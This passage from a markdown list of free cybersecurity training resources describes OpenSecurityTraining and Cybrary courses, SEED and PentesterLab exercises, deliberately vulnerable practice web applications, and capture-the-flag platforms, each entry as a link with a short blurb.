reinforce the material. Some of the topics include capturing packets with tcpdump, mining DNS resolutions using only command-line tools, and busting obfuscated protocols. This class will prepare students to tackle common problems and help them begin developing the skills to handle more advanced networking challenges. - [Malware Dynamic Analysis](http://opensecuritytraining.info/MalwareDynamicAnalysis.html)<br> This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding - [Secure Code Review](http://opensecuritytraining.info/SecureCodeReview.html)<br> The course briefly talks about the development lifecycle and the importance of peer reviews in delivering a quality product. How to perform this review is discussed and how to keep secure coding a priority during the review is stressed. A variety of hands-on exercises will address common coding mistakes, what to focus on during a review, and how to manage limited time. - [Smart Cards](http://opensecuritytraining.info/SmartCards.html)<br> This course shows how smart cards are different compared to other type of cards. It is explained how smart cards can be used to realize confidentiality and integrity of information. - [The Life of Binaries](http://opensecuritytraining.info/LifeOfBinaries.html)<br> Along the way we discuss the relevance of security at different stages of a binary’s life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way which malware “packers” duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR). - [Understanding Cryptology: Core Concepts](http://opensecuritytraining.info/CryptoCore.html)<br> This is an introduction to cryptology with a focus on applied cryptology. It was designed to be accessible to a wide audience, and therefore does not include a rigorous mathematical foundation (this will be covered in later classes). - [Understanding Cryptology: Cryptanalysis](http://opensecuritytraining.info/Cryptanalysis.html)<br> A class for those who want to stop learning about building cryptographic systems and want to attack them. This course is a mixture of lecture designed to introduce students to a variety of code-breaking techniques and python labs to solidify those concepts. Unlike its sister class, [Core Concepts](http://opensecuritytraining.info/CryptoCore.html), math is necessary for this topic. #### Intermediate Classes - [Exploits 1: Introduction to Software Exploits](http://opensecuritytraining.info/Exploits1.html)<br> Software vulnerabilities are flaws in program logic that can be leveraged by an attacker to execute arbitrary code on a target system. This class will cover both the identification of software vulnerabilities and the techniques attackers use to exploit them. In addition, current techniques that attempt to remediate the threat of software vulnerability exploitation will be discussed. - [Exploits 2: Exploitation in the Windows Environment](http://opensecuritytraining.info/Exploits2.html)<br> This course covers the exploitation of stack corruption vulnerabilities in the Windows environment. Stack overflows are programming flaws that often times allow an attacker to execute arbitrary code in the context of a vulnerable program. There are many nuances involved with exploiting these vulnerabilities in Windows. Window's exploit mitigations such as DEP, ASLR, SafeSEH, and SEHOP, makes leveraging these programming bugs more difficult, but not impossible. The course highlights the features and weaknesses of many the exploit mitigation techniques deployed in Windows operating systems. Also covered are labs that describe the process of finding bugs in Windows applications with mutation based fuzzing, and then developing exploits that target those bugs. - [Intermediate Intel x86: Architecture, Assembly, Applications, & Alliteration](http://opensecuritytraining.info/IntermediateX86.html)<br> Building upon the Introductory Intel x86 class, this class goes into more depth on topics already learned, and introduces more advanced topics that dive deeper into how Intel-based systems work. #### Advanced Classes - [Advanced x86: Virtualization with Intel VT-x](http://opensecuritytraining.info/AdvancedX86-VTX.html)<br> The purpose of this course is to provide a hands on introduction to Intel hardware support for virtualization. The first part will motivate the challenges of virtualization in the absence of dedicated hardware. This is followed by a deep dive on the Intel virtualization "API" and labs to begin implementing a blue pill / hyperjacking attack made famous by researchers like Joanna Rutkowska and Dino Dai Zovi et al. Finally a discussion of virtualization detection techniques. - [Advanced x86: Introduction to BIOS & SMM](http://opensecuritytraining.info/IntroBIOS.html)<br> We will cover why the BIOS is critical to the security of the platform. This course will also show you what capabilities and opportunities are provided to an attacker when BIOSes are not properly secured. We will also provide you tools for performing vulnerability analysis on firmware, as well as firmware forensics. This class will take people with existing reverse engineering skills and teach them to analyze UEFI firmware. This can be used either for vulnerability hunting, or to analyze suspected implants found in a BIOS, without having to rely on anyone else. - [Introduction to Reverse Engineering Software](http://opensecuritytraining.info/IntroductionToReverseEngineering.html)<br> Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch, or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day from recreating outdated and incompatible software, understanding malicious code, or exploiting weaknesses in software. - [Reverse Engineering Malware](http://opensecuritytraining.info/ReverseEngineeringMalware.html)<br> This class picks up where the [Introduction to Reverse Engineering Software](http://opensecuritytraining.info/IntroductionToReverseEngineering.html) course left off, exploring how static reverse engineering techniques can be used to understand what a piece of malware does and how it can be removed. - [Rootkits: What they are, and how to find them](http://opensecuritytraining.info/Rootkits.html)<br> Rootkits are a class of malware which are dedicated to hiding the attacker’s presence on a compromised system. This class will focus on understanding how rootkits work, and what tools can be used to help find them. - [The Adventures of a Keystroke: An in-depth look into keylogging on Windows](http://opensecuritytraining.info/Keylogging.html)<br> Keyloggers are one of the most widely used components in malware. Keyboard and mouse are the devices nearly all of the PCs are controlled by, this makes them an important target of malware authors. If someone can record your keystrokes then he can control your whole PC without you noticing. ## Cybrary - Online Cyber Security Training - [CompTIA A+](https://www.cybrary.it/course/comptia-aplus)<br> This course covers the fundamentals of computer technology, basic networking, installation and configuration of PCs, laptops and related hardware, as well as configuring common features for mobile operation systems Android and Apple iOS. - [CompTIA Linux+](https://www.cybrary.it/course/comptia-linux-plus)<br> Our free, self-paced online Linux+ training prepares students with the knowledge to become a certified Linux+ expert, spanning a curriculum that covers Linux maintenance tasks, user assistance and installation and configuration. - [CompTIA Cloud+](https://www.cybrary.it/course/comptia-cloud-plus)<br> Our free, online Cloud+ training addresses the essential knowledge for implementing, managing and maintaining cloud technologies as securely as possible. It covers cloud concepts and models, virtualization, and infrastructure in the cloud. - [CompTIA Network+](https://www.cybrary.it/course/comptia-network-plus)<br> In addition to building one’s networking skill set, this course is also designed to prepare an individual for the Network+ certification exam, a distinction that can open a myriad of job opportunities from major companies - [CompTIA Advanced Security Practitioner](https://www.cybrary.it/course/comptia-casp)<br> In our free online CompTIA CASP training, you’ll learn how to integrate advanced authentication, how to manage risk in the enterprise, how to conduct vulnerability assessments and how to analyze network security concepts and components. - [CompTIA Security+](https://www.cybrary.it/course/comptia-security-plus)<br> Learn about general security concepts, basics of cryptography, communications security and operational and organizational security. With the increase of major security breaches that are occurring, security experts are needed now more than ever. - [ITIL Foundation](https://www.cybrary.it/course/itil)<br> Our online ITIL Foundation training course provides baseline knowledge for IT service management best practices: how to reduce costs, increase enhancements in processes, improve IT productivity and overall customer satisfaction. - [Cryptography](https://www.cybrary.it/course/cryptography)<br> In this online course we will be examining how cryptography is the cornerstone of security technologies, and how through its use of different encryption methods you can protect private or sensitive information from unauthorized access. - [Cisco CCNA](https://www.cybrary.it/course/cisco-ccna)<br> Our free, online, self-paced CCNA training teaches students to install, configure, troubleshoot and operate LAN, WAN and dial access services for medium-sized networks. You’ll also learn how to describe the operation of data networks. - [Virtualization Management](https://www.cybrary.it/course/virtualization-management)<br> Our free, self-paced online Virtualization Management training class focuses on installing, configuring and managing virtualization software. You’ll learn how to work your way around the cloud and how to build the infrastructure for it. - [Penetration Testing and Ethical Hacking](https://www.cybrary.it/course/ethical-hacking)<br> If the idea of hacking as a career excites you, you’ll benefit greatly from completing this training here on Cybrary. You’ll learn how to exploit networks in the manner of an attacker, in order to find out how protect the system from them. - [Computer and Hacking Forensics](https://www.cybrary.it/course/computer-hacking-forensics-analyst)<br> Love the idea of digital forensics investigation? That’s what computer forensics is all about. You’ll learn how to; determine potential online criminal activity at its inception, legally gather evidence, search and investigate wireless attacks. - [Web Application Penetration Testing](https://www.cybrary.it/course/web-application-pen-testing)<br> In this course, SME, Raymond Evans, takes you on a wild and fascinating journey into the cyber security discipline of web application pentesting. This is a very hands-on course that will require you to set up your own pentesting environment. - [CISA - Certified Information Systems Auditor](https://www.cybrary.it/course/cisa)<br> In order to face the dynamic requirements of meeting enterprise vulnerability management challenges, this course covers the auditing process to ensure that you have the ability to analyze the state of your organization and make changes where needed. - [Secure Coding](https://www.cybrary.it/course/secure-coding)<br> Join industry leader Sunny Wear as she discusses secure coding guidelines and how secure coding is important when it comes to lowering risk and vulnerabilities. Learn about XSS, Direct Object Reference, Data Exposure, Buffer Overflows, & Resource Management. - [NIST 800-171 Controlled Unclassified Information Course](https://www.cybrary.it/course/nist-800-171-controlled-unclassified-information-course)<br> The Cybrary NIST 800-171 course covers the 14 domains of safeguarding controlled unclassified information in non-federal agencies. Basic and derived requirements are presented for each security domain as defined in the NIST 800-171 special publication. - [Advanced Penetration Testing](https://www.cybrary.it/course/advanced-penetration-testing)<br> This course covers how to attack from the web using cross-site scripting, SQL injection attacks, remote and local file inclusion and how to understand the defender of the network you’re breaking into to. You’ll also learn tricks for exploiting a network. - [Intro to Malware Analysis and Reverse Engineering](https://www.cybrary.it/course/malware-analysis)<br> In this course you’ll learn how to perform dynamic and static analysis on all major files types, how to carve malicious executables from documents and how to recognize common malware tactics and debug and disassemble malicious binaries. - [Social Engineering and Manipulation](https://www.cybrary.it/course/social-engineering)<br> In this online, self-paced Social Engineering and Manipulation training class, you will learn how some of the most elegant social engineering attacks take place. Learn to perform these scenarios and what is done during each step of the attack. - [Post Exploitation Hacking](https://www.cybrary.it/course/post-exploitation-hacking)<br> In this free self-paced online training course, you’ll cover three main topics: Information Gathering, Backdooring and Covering Steps, how to use system specific tools to get general information, listener shells, metasploit and meterpreter scripting. - [Python for Security Professionals](https://www.cybrary.it/course/python)<br> This course will take you from basic concepts to advanced scripts in just over 10 hours of material, with a focus on networking and security. - [Metasploit](https://www.cybrary.it/course/metasploit)<br> This free Metasploit training class will teach you to utilize the deep capabilities of Metasploit for penetration testing and help you to prepare to run vulnerability assessments for organizations of any size. - [ISC2 CCSP - Certified Cloud Security Professional](https://www.cybrary.it/course/isc2-certified-cloud-security-professional-ccsp)<br> The reality is that attackers never rest, and along with the traditional threats targeting internal networks and systems, an entirely new variety specifically targeting the cloud has emerged. **Executive** - [CISSP - Certified Information Systems Security Professional](https://www.cybrary.it/course/cissp)<br> Our free online CISSP (8 domains) training covers topics ranging from operations security, telecommunications, network and internet security, access control systems and methodology and business continuity planning. - [CISM - Certified Information Security Manager](https://www.cybrary.it/course/cism)<br> Cybrary’s Certified Information Security Manager (CISM) course is a great fit for IT professionals looking to move up in their organization and advance their careers and/or current CISMs looking to learn about the latest trends in the IT industry. - [PMP - Project Management Professional](https://www.cybrary.it/course/project-management-professional)<br> Our free online PMP training course educates on how to initiate, plan and manage a project, as well as the process behind analyzing risk, monitoring and controlling project contracts and how to develop schedules and budgets. - [CRISC - Certified in Risk and Information Systems Control](https://www.cybrary.it/course/crisc)<br> Certified in Risk and Information Systems Control is for IT and business professionals who develop and maintain information system controls, and whose job revolves around security operations and compliance. - [Risk Management Framework](https://www.cybrary.it/course/risk-management-framework)<br> The National Institute of Standards and Technology (NIST) established the Risk Management Framework (RMF) as a set of operational and procedural standards or guidelines that a US government agency must follow to ensure the compliance of its data systems. - [ISC2 CSSLP - Certified Secure Software Life-cycle Professional](https://www.cybrary.it/course/csslp-training)<br> This course helps professionals in the industry build their credentials to advance within their organization, allowing them to learn valuable managerial skills as well as how to apply the best practices to keep organizations systems running well. - [COBIT - Control Objectives for Information and Related Technologies](https://www.cybrary.it/course/cobit)<br> Cybrary’s online COBIT certification program offers an opportunity to learn about all the components of the COBIT 5 framework, covering everything from the business end-to-end to strategies in how effectively managing and governing enterprise IT. - [Corporate Cybersecurity Management](https://www.cybrary.it/course/corporate-cybersecurity-management)<br> Cyber risk, legal considerations and insurance are often overlooked by businesses and this sets them up for major financial devastation should an incident occur. ## Hopper's Roppers Hopper's Roppers is a community dedicated to providing free training to beginners so that they have the best introduction to the field possible and have the knowledge, skills, and confidence required to figure out what the next ten thousand hours will require them to learn. - [Introduction to Computing Fundamentals](https://hoppersroppers.org/course.html)<br> A free, self-paced curriculum designed to give a beginner all of the foundational knowledge and skills required to be successful. It teaches security fundamentals along with building a strong technical foundation that students will build on for years to come. **Learning Objectives:** Linux, Hardware, Networking, Operating Systems, Power User, Scripting **Pre-Reqs:** None - [Introduction to Capture the Flags](https://hoppersroppers.github.io/courseCTF.html)<br> Free course designed to teach the fundamentals required to be successful in Capture the Flag competitions and compete in the picoCTF event. Our mentors will track your progress and provide assistance every step of the way. **Learning Objectives:** CTFs, Forensics, Cryptography, Web-Exploitation **Pre-Reqs:** Linux, Scripting - [Introduction to Security](https://hoppersroppers.github.io/courseSecurity.html)<br> Free course designed to teach students security theory and have them execute defensive measures so that they are better prepared against threats online and in the physical world. **Learning Objectives:** Security Theory, Practical Application, Real-World Examples **Pre-Reqs:** None - [Practical Skills Bootcamp](https://hoppersroppers.github.io/bootcamp.html)<br> Our free course to introduce students to Linux fundamentals and Python scripting so that they "Learn Just Enough to be Dangerous". Fastest way to get a beginner up to speed on practical knowledge. **Learning Objectives:** Linux, Scripting **Pre-Reqs:** None Laboratories ============ ## Syracuse University's SEED ### Hands-on Labs for Security Education Started in 2002, funded by a total of 1.3 million dollars from NSF, and now used by hundreds of educational institutes worldwide, the SEED project's objective is to develop hands-on laboratory exercises (called SEED labs) for computer and information security education and help instructors adopt these labs in their curricula. ### Software Security Labs These labs cover some of the most common vulnerabilities in general software. The labs show students how attacks work in exploiting these vulnerabilities. - [Buffer-Overflow Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow)<br> Launching attack to exploit the buffer-overflow vulnerability using shellcode. Conducting experiments with several countermeasures. - [Return-to-libc Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Return_to_libc)<br> Using the return-to-libc technique to defeat the "non-executable stack" countermeasure of the buffer-overflow attack. - [Environment Variable and Set-UID Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Environment_Variable_and_SetUID)<br> This is a redesign of the Set-UID lab (see below). - [Set-UID Program Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Set-UID)<br> Launching attacks on privileged Set-UID root program. Risks of environment variables. Side effects of system(). - [Race-Condition Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Race_Condition)<br> Exploiting the race condition vulnerability in privileged program. Conducting experiments with various countermeasures. - [Format-String Vulnerability Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Format_String)<br> Exploiting the format string vulnerability to crash a program, steal sensitive information, or modify critical data. - [Shellshock Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Shellshock)<br> Launch attack to exploit the Shellshock vulnerability that is discovered in late 2014. ### Network Security Labs These labs cover topics on network security, ranging from attacks on TCP/IP and DNS to various network security technologies (Firewall, VPN, and IPSec). - [TCP/IP Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/TCPIP)<br> Launching attacks to exploit the vulnerabilities of the TCP/IP protocol, including session hijacking, SYN flooding, TCP reset attacks, etc. - [Heartbleed Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Heartbleed)<br> Using the heartbleed attack to steal secrets from a remote server. - [Local DNS Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/DNS_Local)<br> Using several methods to conduct DNS pharming attacks on computers in a LAN environment. - [Remote DNS Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/DNS_Remote)<br> Using the Kaminsky method to launch DNS cache poisoning attacks on remote DNS servers. - [Packet Sniffing and Spoofing Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Sniffing_Spoofing)<br> Writing programs to sniff packets sent over the local network; writing programs to spoof various types of packets. - [Linux Firewall Exploration Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_Linux)<br> Writing a simple packet-filter firewall; playing with Linux's built-in firewall software and web-proxy firewall; experimenting with ways to evade firewalls. - [Firewall-VPN Lab: Bypassing Firewalls using VPN](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_VPN)<br> Implement a simple vpn program (client/server), and use it to bypass firewalls. - [Virtual Private Network (VPN) Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/VPN)<br> Design and implement a transport-layer VPN system for Linux, using the TUN/TAP technologies. This project requires at least a month of time to finish, so it is good for final project. - [Minix IPSec Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/IPSec)<br> Implement the IPSec protocol in the Minix operating system and use it to set up Virtual Private Networks. - [Minix Firewall Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Networking/Firewall_Minix)<br> Implementing a simple firewall in Minix operating system. ### Web Security Labs These labs cover some of the most common vulnerabilities in web applications. The labs show students how attacks work in exploiting these vulnerabilities. #### Elgg-Based Labs Elgg is an open-source social-network system. We have modified it for our labs. - [Cross-Site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-Site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_CSRF_Elgg)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Web Tracking Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_Tracking_Elgg)<br> Experimenting with the web tracking technology to see how users can be checked when they browse the web. - [SQL Injection Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_SQL_Injection)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. #### Collabtive-Based Labs Collabtive is an open-source web-based project management system. We have modified it for our labs. - [Cross-site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/XSS_Collabtive)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/CSRF_Collabtive)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [SQL Injection Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/SQL_Injection_Collabtive)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Web Browser Access Control Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Web/Web_SOP_Collabtive)<br> Exploring browser's access control system to understand its security policies. #### PhpBB-Based Labs PhpBB is an open-source web-based message board system, allowing users to post messages. We have modified it for our labs. - [Cross-site Scripting Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS)<br> Launching the cross-site scripting attack on a vulnerable web application. Conducting experiments with several countermeasures. - [Cross-site Request Forgery Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_CSRF)<br> Launching the cross-site request forgery attack on a vulnerable web application. Conducting experiments with several countermeasures. - [SQL Injection Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_SQL_Injection)<br> Launching the SQL-injection attack on a vulnerable web application. Conducting experiments with several countermeasures. - [ClickJacking Attack Lab](http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/ClickJacking)<br> Launching the ClickJacking attack on a vulnerable web site. Conducting experiments with several countermeasures. ### System Security Labs These labs cover the security mechanisms in operating system, mostly focusing on access control mechanisms in Linux. - [Linux Capability Exploration Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/Capability_Exploration)<br> Exploring the POSIX 1.e capability system in Linux to see how privileges can be divided into smaller pieces to ensure the compliance with the Least Privilege principle. - [Role-Based Access Control (RBAC) Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/RBAC_Cap)<br> Designing and implementing an integrated access control system for Minix that uses both capability-based and role-based access control mechanisms. Students need to modify the Minix kernel. - [Encrypted File System Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/System/EFS)<br> Designing and implementing an encrypted file system for Minix. Students need to modify the Minix kernel. ### Cryptography Labs These labs cover three essential concepts in cryptography, including secrete-key encryption, one-way hash function, and public-key encryption and PKI. - [Secret Key Encryption Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_Encryption)<br> Exploring the secret-key encryption and its applications using OpenSSL. - [One-Way Hash Function Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_Hash)<br> Exploring one-way hash function and its applications using OpenSSL. - [Public-Key Cryptography and PKI Lab](http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Crypto/Crypto_PublicKey)<br> Exploring public-key cryptography, digital signature, certificate, and PKI using OpenSSL. ### Mobile Security Labs These labs focus on the smartphone security, covering the most common vulnerabilities and attacks on mobile devices. An Android VM is provided for these labs. - [Android Repackaging Lab](http://www.cis.syr.edu/~wedu/seed/Labs_Android5.1/Android_Repackaging)<br> Insert malicious code inside an existing Android app, and repackage it. - [Android Device Rooting Lab](http://www.cis.syr.edu/~wedu/seed/Labs_Android5.1/Android_Rooting)<br> Develop an OTA (Over-The-Air) package from scratch to root an Android device. ## Pentester Lab There is only one way to properly learn web penetration testing: by getting your hands dirty. We teach how to manually find and exploit vulnerabilities. You will understand the root cause of the problems and the methods that can be used to exploit them. Our exercises are based on common vulnerabilities found in different systems. The issues are not emulated. We provide you real systems with real vulnerabilities. - [From SQL Injection to Shell](https://pentesterlab.com/exercises/from_sqli_to_shell)<br> This exercise explains how you can, from a SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. - [From SQL Injection to Shell II](https://pentesterlab.com/exercises/from_sqli_to_shell_II)<br> This exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system. - [From SQL Injection to Shell: PostgreSQL edition](https://pentesterlab.com/exercises/from_sqli_to_shell_pg_edition)<br> This exercise explains how you can from a SQL injection gain access to the administration console. Then in the administration console, how you can run commands on the system. - [Web for Pentester](https://pentesterlab.com/exercises/web_for_pentester)<br> This exercise is a set of the most common web vulnerabilities. - [Web for Pentester II](https://pentesterlab.com/exercises/web_for_pentester_II)<br> This exercise is a set of the most common web vulnerabilities. - [PHP Include And Post Exploitation](https://pentesterlab.com/exercises/php_include_and_post_exploitation)<br> This exercice describes the exploitation of a local file include with limited access. Once code execution is gained, you will see some post exploitation tricks. - [Linux Host Review](https://pentesterlab.com/exercises/linux_host_review)<br> This exercice explains how to perform a Linux host review, what and how you can check the configuration of a Linux server to ensure it is securely configured. The reviewed system is a traditional Linux-Apache-Mysql-PHP (LAMP) server used to host a blog. - [Electronic Code Book](https://pentesterlab.com/exercises/ecb)<br> This exercise explains how you can tamper with an encrypted cookies to access another user's account. - [Rack Cookies and Commands injection](https://pentesterlab.com/exercises/rack_cookies_and_commands_injection)<br> After a short brute force introduction, this exercice explains the tampering of rack cookie and how you can even manage to modify a signed cookie (if the secret is trivial). Using this issue, you will be able to escalate your privileges and gain commands execution. - [Padding Oracle](https://pentesterlab.com/exercises/padding_oracle)<br> This course details the exploitation of a weakness in the authentication of a PHP website. The website uses Cipher Block Chaining (CBC) to encrypt information provided by users and use this information to ensure authentication. The application also leaks if the padding is valid when decrypting the information. We will see how this behavior can impact the authentication and how it can be exploited. - [XSS and MySQL FILE](https://pentesterlab.com/exercises/xss_and_mysql_file)<br> This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it. - [Axis2 Web service and Tomcat Manager](https://pentesterlab.com/exercises/axis2_and_tomcat_manager)<br> This exercice explains the interactions between Tomcat and Apache, then it will show you how to call and attack an Axis2 Web service. Using information retrieved from this attack, you will be able to gain access to the Tomcat Manager and deploy a WebShell to gain commands execution. - [Play Session Injection](https://pentesterlab.com/exercises/play_session_injection)<br> This exercise covers the exploitation of a session injection in the Play framework. This issue can be used to tamper with the content of the session while bypassing the signing mechanism. - [Play XML Entities](https://pentesterlab.com/exercises/play_xxe)<br> This exercise covers the exploitation of a XML entities in the Play framework. - [CVE-2007-1860: mod_jk double-decoding](https://pentesterlab.com/exercises/cve-2007-1860)<br> This exercise covers the exploitation of CVE-2007-1860. This vulnerability allows an attacker to gain access to unaccessible pages using crafted requests. This is a common trick that a lot of testers miss. - [CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability](https://pentesterlab.com/exercises/cve-2008-1930)<br> This exercise explains how you can exploit CVE-2008-1930 to gain access to the administration interface of a Wordpress installation. - [CVE-2012-1823: PHP CGI](https://pentesterlab.com/exercises/cve-2012-1823)<br> This exercise explains how you can exploit CVE-2012-1823 to retrieve the source code of an application and gain code execution. - [CVE-2012-2661: ActiveRecord SQL injection](https://pentesterlab.com/exercises/cve-2012-2661)<br> This exercise explains how you can exploit CVE-2012-2661 to retrieve information from a database. - [CVE-2012-6081: MoinMoin code execution](https://pentesterlab.com/exercises/cve-2012-6081)<br> This exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian's wiki and Python documentation website. - [CVE-2014-6271/Shellshock](https://pentesterlab.com/exercises/cve-2014-6271)<br> This exercise covers the exploitation of a Bash vulnerability through a CGI. ## Dr. Thorsten Schneider's Binary Auditing Learn the fundamentals of Binary Auditing. Know how HLL mapping works, get more inner file understanding than ever. Learn how to find and analyse software vulnerability. Dig inside Buffer Overflows and learn how exploits can be prevented. Start to analyse your first viruses and malware the safe way. Learn about simple tricks and how viruses look like using real life examples. - [Binary Auditing](http://www.binary-auditing.com/) ## Damn Vulnerable Web Application (DVWA) Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment. - [Damn Vulnerable Web Application (DVWA)](https://github.com/ethicalhack3r/DVWA) ## Damn Vulnerable Web Services Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities. The aim of this project is to help security professionals learn about Web Application Security through the use of a practical lab environment. - [Damn Vulnerable Web Services](https://github.com/snoopysecurity/dvws) ## NOWASP (Mutillidae) OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. With dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software. - [OWASP Mutillidae](http://sourceforge.net/projects/mutillidae/files/) ## OWASP Broken Web Applications Project Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost and commercial VMware products. - [OWASP Broken Web Applications Project](https://sourceforge.net/projects/owaspbwa/files/1.2/) ## OWASP Bricks Bricks is a web application security learning platform built on PHP and MySQL. The project focuses on variations of commonly seen application security issues. Each 'Brick' has some sort of security issue which can be leveraged manually or using automated software tools. The mission is to 'Break the Bricks' and thus learn the various aspects of web application security. - [OWASP Bricks](http://sechow.com/bricks/download.html) ## OWASP Hackademic Challenges Project The Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe and controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through an attacker's perspective. - [OWASP Hackademic Challenges project](https://github.com/Hackademic/hackademic/) ## Web Attack and Exploitation Distro (WAED) The Web Attack and Exploitation Distro (WAED) is a lightweight virtual machine based on Debian Distribution. WAED is pre-configured with various real-world vulnerable web applications in a sandboxed environment. It includes pentesting tools that aid in finding web application vulnerabilities. The main motivation behind this project is to provide a practical environment to learn about web application's vulnerabilities without the hassle of dealing with complex configurations. Currently, there are around 18 vulnerable applications installed in WAED. - [Web Attack and Exploitation Distro (WAED)](http://www.waed.info/) ## Xtreme Vulnerable Web Application (XVWA) XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security. It’s not advisable to host this application online as it is designed to be “Xtremely Vulnerable”. We recommend hosting this application in local/controlled environment and sharpening your application security ninja skills with any tools of your own choice. It’s totally legal to break or hack into this. The idea is to evangelize web application security to the community in possibly the easiest and fundamental way. Learn and acquire these skills for good purpose. How you use these skills and knowledge base is not our responsibility. - [Xtreme Vulnerable Web Application (XVWA)](https://github.com/s4n7h0/xvwa) ## WebGoat: A deliberately insecure Web Application WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons. - [WebGoat](https://github.com/WebGoat/WebGoat) ## Audi-1's SQLi-LABS SQLi-LABS is a comprehensive test bed to Learn and understand nitti gritty of SQL injections and thereby helps professionals understand how to protect. - [SQLi-LABS](https://github.com/Audi-1/sqli-labs) - [SQLi-LABS Videos](http://www.securitytube.net/user/Audi) Capture the Flag ================ #### Hack The Box This pentester training platform/lab is full of machines (boxes) to hack on the different difficulty level. Majority of the content generated by the community and released on the website after the staff's approval. Besides boxes users also can pick static challenges or work on advanced tasks like Fortress or Endgame. - [Hack The Box link](https://www.hackthebox.eu/) #### Vulnhub We all learn in different ways: in a group, by yourself, reading books, watching/listening to other people, making notes or things out for yourself. Learning the basics & understanding them is essential; this knowledge can be enforced by then putting it into practice. Over the years people have been creating these resources and a lot of time has been put into them, creating 'hidden gems' of training material. However, unless you know of them, its hard to discover them. So VulnHub was born to cover as many as possible, creating a catalogue of 'stuff' that is (legally) 'breakable, hackable & exploitable' - allowing you to learn in a safe environment and practice 'stuff' out. When something is added to VulnHub's database it will be indexed as best as possible, to try and give you the best match possible for what you're wishing to learn or experiment with. - [Vulnhub Repository](https://www.vulnhub.com/) #### CTF Write Ups - [CTF Resources](https://ctfs.github.io/resources)<br> A general collection of information, tools, and tips regarding CTFs and similar security competitions. - [CTF write-ups 2016](https://github.com/ctfs/write-ups-2016)<br> Wiki-like CTF write-ups repository, maintained by the community. (2015) - [CTF write-ups 2015](https://github.com/ctfs/write-ups-2015)<br> Wiki-like CTF write-ups repository, 